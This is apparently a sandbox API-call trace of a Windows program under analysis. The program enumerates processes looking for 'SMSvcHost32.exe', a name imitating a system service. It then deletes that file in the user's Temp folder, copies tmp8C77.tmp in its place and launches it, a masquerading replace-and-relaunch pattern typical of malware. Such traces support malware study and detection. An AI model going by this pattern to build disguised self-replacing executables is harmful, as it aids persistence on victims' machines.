	[0086.613] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0086.614] StrCmpIW (psz1="SMSvcHost32.exe", psz2="csrss.exe") returned 1
	[0086.614] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0086.615] StrCmpIW (psz1="SMSvcHost32.exe", psz2="winlogon.exe") returned -1
	[0086.615] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0086.616] StrCmpIW (psz1="SMSvcHost32.exe", psz2="services.exe") returned 1
	[0086.616] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0086.617] StrCmpIW (psz1="SMSvcHost32.exe", psz2="lsass.exe") returned 1
	[0086.617] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.618] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.618] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.618] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.618] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0086.619] StrCmpIW (psz1="SMSvcHost32.exe", psz2="dwm.exe") returned 1
	[0086.619] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.620] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.620] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.621] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.621] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.621] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.622] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.622] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.622] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.623] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.623] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.623] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.623] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.624] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.624] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0086.625] StrCmpIW (psz1="SMSvcHost32.exe", psz2="spoolsv.exe") returned -1
	[0086.625] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1
	[0086.625] StrCmpIW (psz1="SMSvcHost32.exe", psz2="sihost.exe") returned 1
	[0086.625] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.626] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.626] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x650, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1
	[0086.626] StrCmpIW (psz1="SMSvcHost32.exe", psz2="OfficeClickToRun.exe") returned 1
	[0086.626] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1
	[0086.627] StrCmpIW (psz1="SMSvcHost32.exe", psz2="RuntimeBroker.exe") returned 1
	[0086.627] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.628] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.628] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0086.628] StrCmpIW (psz1="SMSvcHost32.exe", psz2="taskhostw.exe") returned -1
	[0086.628] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0086.629] StrCmpIW (psz1="SMSvcHost32.exe", psz2="explorer.exe") returned 1
	[0086.629] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0086.629] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SkypeHost.exe") returned 1
	[0086.630] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1
	[0086.630] StrCmpIW (psz1="SMSvcHost32.exe", psz2="ShellExperienceHost.exe") returned 1
	[0086.630] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1
	[0086.631] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SearchUI.exe") returned 1
	[0086.631] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0086.631] StrCmpIW (psz1="SMSvcHost32.exe", psz2="dllhost.exe") returned 1
	[0086.631] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0086.632] StrCmpIW (psz1="SMSvcHost32.exe", psz2="audiodg.exe") returned 1
	[0086.632] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0086.633] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SkypeHost.exe") returned 1
	[0086.633] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.633] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.633] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1
	[0086.634] StrCmpIW (psz1="SMSvcHost32.exe", psz2="backgroundTaskHost.exe") returned 1
	[0086.634] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0086.635] StrCmpIW (psz1="SMSvcHost32.exe", psz2="taskhostw.exe") returned -1
	[0086.635] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="develop-patent.exe")) returned 1
	[0086.635] StrCmpIW (psz1="SMSvcHost32.exe", psz2="develop-patent.exe") returned 1
	[0086.635] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="its.exe")) returned 1
	[0086.636] StrCmpIW (psz1="SMSvcHost32.exe", psz2="its.exe") returned 1
	[0086.636] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gently budapest.exe")) returned 1
	[0086.637] StrCmpIW (psz1="SMSvcHost32.exe", psz2="gently budapest.exe") returned 1
	[0086.637] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thoroughlypriestprefix.exe")) returned 1
	[0086.637] StrCmpIW (psz1="SMSvcHost32.exe", psz2="thoroughlypriestprefix.exe") returned -1
	[0086.637] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inserted_field.exe")) returned 1
	[0086.638] StrCmpIW (psz1="SMSvcHost32.exe", psz2="inserted_field.exe") returned 1
	[0086.638] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="semi bay.exe")) returned 1
	[0086.638] StrCmpIW (psz1="SMSvcHost32.exe", psz2="semi bay.exe") returned 1
	[0086.638] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outdoor.exe")) returned 1
	[0086.639] StrCmpIW (psz1="SMSvcHost32.exe", psz2="outdoor.exe") returned 1
	[0086.651] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wool-parish-horses.exe")) returned 1
	[0086.652] StrCmpIW (psz1="SMSvcHost32.exe", psz2="wool-parish-horses.exe") returned -1
	[0086.652] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoken-delayed.exe")) returned 1
	[0086.652] StrCmpIW (psz1="SMSvcHost32.exe", psz2="spoken-delayed.exe") returned -1
	[0086.652] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spokesman.exe")) returned 1
	[0086.653] StrCmpIW (psz1="SMSvcHost32.exe", psz2="spokesman.exe") returned -1
	[0086.653] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="oxide.exe")) returned 1
	[0086.653] StrCmpIW (psz1="SMSvcHost32.exe", psz2="oxide.exe") returned 1
	[0086.653] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="off-covered-playlist.exe")) returned 1
	[0086.654] StrCmpIW (psz1="SMSvcHost32.exe", psz2="off-covered-playlist.exe") returned 1
	[0086.654] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bryant.exe")) returned 1
	[0086.655] StrCmpIW (psz1="SMSvcHost32.exe", psz2="bryant.exe") returned 1
	[0086.655] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="postal-fool.exe")) returned 1
	[0086.655] StrCmpIW (psz1="SMSvcHost32.exe", psz2="postal-fool.exe") returned 1
	[0086.655] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crm_remarks_ctrl.exe")) returned 1
	[0086.656] StrCmpIW (psz1="SMSvcHost32.exe", psz2="crm_remarks_ctrl.exe") returned 1
	[0086.656] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="volunteer.exe")) returned 1
	[0086.656] StrCmpIW (psz1="SMSvcHost32.exe", psz2="volunteer.exe") returned -1
	[0086.656] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ranger_tu_community.exe")) returned 1
	[0086.657] StrCmpIW (psz1="SMSvcHost32.exe", psz2="ranger_tu_community.exe") returned 1
	[0086.657] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eddie_cholesterol_reprint.exe")) returned 1
	[0086.658] StrCmpIW (psz1="SMSvcHost32.exe", psz2="eddie_cholesterol_reprint.exe") returned 1
	[0086.658] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bracket-natural-chancellor.exe")) returned 1
	[0086.658] StrCmpIW (psz1="SMSvcHost32.exe", psz2="bracket-natural-chancellor.exe") returned 1
	[0086.658] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="safari.exe")) returned 1
	[0086.659] StrCmpIW (psz1="SMSvcHost32.exe", psz2="safari.exe") returned 1
	[0086.659] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0086.659] StrCmpIW (psz1="SMSvcHost32.exe", psz2="WmiPrvSE.exe") returned -1
	[0086.659] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.660] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.660] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0086.661] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SMSvcHost32.exe") returned 0
	[0086.661] OpenProcess (dwDesiredAccess=0x401, bInheritHandle=0, dwProcessId=0xdb8) returned 0x1f8
	[0086.661] GetExitCodeProcess (in: hProcess=0x1f8, lpExitCode=0x263ff6c | out: lpExitCode=0x263ff6c*=0x0) returned 1
	[0086.661] CloseHandle (hObject=0x1f8) returned 1
	[0086.661] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0086.661] StrCmpIW (psz1="SMSvcHost32.exe", psz2="sppsvc.exe") returned -1
	[0086.661] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp8C77.tmp")) returned 1
	[0086.662] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp8C77.tmp")) returned 0
	[0086.663] CloseHandle (hObject=0x1f4) returned 1
	[0086.663] Sleep (dwMilliseconds=0x32) 
	[0086.720] DeleteFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 1
	[0086.723] CopyFileW (lpExistingFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\tmp8c77.tmp"), lpNewFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), bFailIfExists=0) returned 1
	[0087.536] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x9000008, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x263ff18*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x263ff5c | out: lpCommandLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpProcessInformation=0x263ff5c*(hProcess=0x1f8, hThread=0x1f4, dwProcessId=0x934, dwThreadId=0x938)) returned 1
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
